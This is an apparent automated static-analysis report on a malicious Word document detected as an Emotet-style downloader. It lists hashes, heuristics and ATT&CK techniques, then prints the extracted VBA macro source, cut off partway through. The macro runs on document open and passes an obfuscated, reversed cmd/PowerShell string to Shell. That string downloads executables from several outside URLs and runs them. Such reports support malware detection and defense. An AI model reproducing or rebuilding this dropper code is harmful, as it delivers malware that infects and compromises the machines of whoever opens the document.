Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca71170483f94cc9…

MALICIOUS

Office (OLE)

66.6 KB Created: 2018-09-07 03:15:00 Authoring application: Microsoft Office Word First seen: 2018-10-13
MD5: b84f21b1538a8797e9f8d5bc3a8e7821 SHA-1: 9e420e77da63dbfaf78bdfce3cd6af991586e414 SHA-256: ca71170483f94cc9d5cf385aed5119287d3e5cc4fa19d9c8746dff5938e324b4
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open heuristic. This macro utilizes the Shell() function to execute a command constructed from various concatenated strings. The specific command being constructed is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Emooodldr-6675034-0' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Malware.Emooodldr-6675034-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6675034-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5828 bytes
SHA-256: 4e598279d62ea917b5d321ec6669af5391246b4bafa2f8b1d856f5e142e1a708
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LajRZMILGjICD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(vMOCJR) + jwMNuEsSJpvhWi + kmYGzuLhum + hvTzrMfY + ILquw + jvjNjMIn + GnzvuiiniPHabD + VkvNktSXsXz, vbHide
End Sub



Attribute VB_Name = "niSHlzLVqzmoD"
Function hvTzrMfY()

On _
Error _
Resume _
Next
Month "Y" + "nL"
   Month "KQwiXY" + "jLha" + "495492393" + "mlZbAuuX"
   Month "uwuIJk" + "wk" + "fwTjXHqIwoE" + "SOr"
   Month "Udj" + "chfiz"
XuZnLVjq = Chr(9 + 18 + 10 + 11 + 51) + "md " + "/" + "V/" + Chr(6 + 12 + 7 + 8 + 34) + Chr(3 + 5 + 3 + 3 + 20) + "s^" + "e" + "^t NnQ" + "=^ ^ " + " "
Month "167927260" + "sss" + "FwdzOsR" + "60637388"
   Month "fwS" + "GwfBdkwUJ"
   Month "234402143" + "JPbcTj"
   Month "AXb" + "321815865"
cPBXbQjnLC = "^ " + " " + "^ " + "   " + " ^ " + " ^" + " " + "  ^ ^" + " ^}}"
Month "B" + "TIiNnEGP" + "528078450" + "341932877"
   Month "lclvLjEiTE" + "168842790"
GNwqvT = "{" + "h" + Chr(9 + 18 + 10 + 11 + 51) + "t" + "^a" + Chr(9 + 18 + 10 + 11 + 51) + "^}" + ";kae" + "rb;" + "h"
Month "wUU" + "qRGL" + "uUhCuQbTJjoK" + "257676650"
YHapqGi = "ZP^" + "$ ^me^t" + "I-^ek" + "ovn^I;)" + "^" + "h^ZP$ "
Month "132918941" + "40959542"
   Month "137656137" + "aq"
   Month "nFa" + "F" + "ViEzEid" + "Xz"
   Month "stNXiiWUsfPL" + "lcmDzIiwbb"
   Month "fEshh" + "kNwQrQRuAErRt"
QHrkppEHcao = "^,s^o" + "^" + "j^" + "$(^" + "e^liFd" + "aoln^w^" + "o^D" + "^.rV"
Month "n" + "8298"
   Month "FXj" + "spFn"
   Month "6230" + "iVTvKz"
   Month "JhZ" + "GF" + "w" + "Om"
NhwWtvH = "^S" + "^$^{" + "yr^t" + "{)R" + "^" + "h^l$^ " + "ni^ ^s" + "oj^$" + "(^h"
hvTzrMfY = XuZnLVjq + cPBXbQjnLC + GNwqvT + YHapqGi + QHrkppEHcao + NhwWtvH
   Month "kRtwYnu" + "Et"
   Month "i" + "w"
   Month "PtD" + "r" + "NHiTlt" + "S"
End Function
Function ILquw()

On _
Error _
Resume _
Next
Month "vITCzFlMsjRSdV" + "Dn" + "wfAwu" + "Yf"
   Month "224725599" + "4071"
   Month "317271293" + "Ew"
   Month "rOiAk" + "489637980" + "9769" + "424443088"
rZPME = Chr(9 + 18 + 10 + 11 + 51) + "aerof" + "^;^'" + "e^xe.^'" + "^+^fo" + "^O^$+" + "^'\^'^+" + Chr(9 + 18 + 10 + 11 + 51) + "^il^b" + "u^" + "p"
Month "WopmrAAoP" + "czRhcAF"
   Month "146017178" + "5799" + "NLdTkGpBViStzV" + "Qo"
BqMiGb = ":v" + "n^e^$=h" + "ZP$;" + "^" + "'" + "^23^8" + "^"
Month "wu" + "IFsf"
bJHLbh = "'^ " + "^= ^" + "f^" + "o" + "^" + "O^$^" + ";)" + "'@" + "^'(t^i^" + "lpS^.^" + "'" + Chr(6 + 12 + 7 + 8 + 34) + "r^W2" + "G^Z^fa" + "/"
Month "p" + "TsVOrairjAYHaz"
   Month "iulYXUs" + "EfCz"
   Month "500015657" + "tQo" + "408177797" + "368423204"
   Month "zj" + "9058"
ftusShCVzBv = "^sd^" + "ao^l^" + "pu" + "/tnetn" + "o" + Chr(9 + 18 + 10 + 11 + 51) + "^-^" + "p^w/^e" + "k." + Chr(9 + 18 + 10 + 11 + 51) + "a" + "^" + ".i" + "bn^ou.^" + "m^" + "uro"
Month "90962034" + "41743155" + "ENHwOM" + "18663823"
   Month "PBNsz" + "6155" + "hwZDbXFNFTIw" + "YZ"
VNrEvWC = "f" + "ur//^:" + "pt^t^" + "h@0" + Chr(9 + 18 + 10 + 11 + 51)
Month "sTmziAFfJpcZ" + "wlIrLB" + "cAOr" + "342231263"
mKPStQraBFj = "^" + "sAV^" + "p^J05^D" + "/^l" + "n.r^e" + "^z" + "^j^iw" + "^e^b" + "r^a" + "av/" + "/:^"
Month "446443300" + "u"
   Month "286589453" + "7159" + "904" + "SHnzNUYAdFhO"
   Month "166247658" + "249"
   Month "9093" + "7718" + "mY" + "qPEz"
   Month "4165" + "BmM"
   Month "217877221" + "vNPkfzKKw"
Yijkiw = "ptt^h" + "@^YVLs" + "5fQq3^" + "m" + "/" + "mo" + Chr(9 + 18 + 10 + 11 + 51) + "^.e" + "n^o^t" + "^saniv" + "//^:p^" + "t^t^"
Month "1952" + "J" + "7066" + "bvjmwGcpj"
rmwjdtp = "h@" + "^o" + "^pt^EU^" + "fX" + "N^M/"
Month "4319" + "7516" + "kM" + "LIYKqTPMXr"
   Month "6147" + "aA"
zFIRk = "mo" + Chr(9 + 18 + 10 + 11 + 51) + "^.^o" + "^ds^a" + "lp.^www" + "//^:^p" + "^tth" + "^@^Zvy^" + "L^64^iq" + "^0^w/b" + "^al" + "t^se^t" + "/^i^f^" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.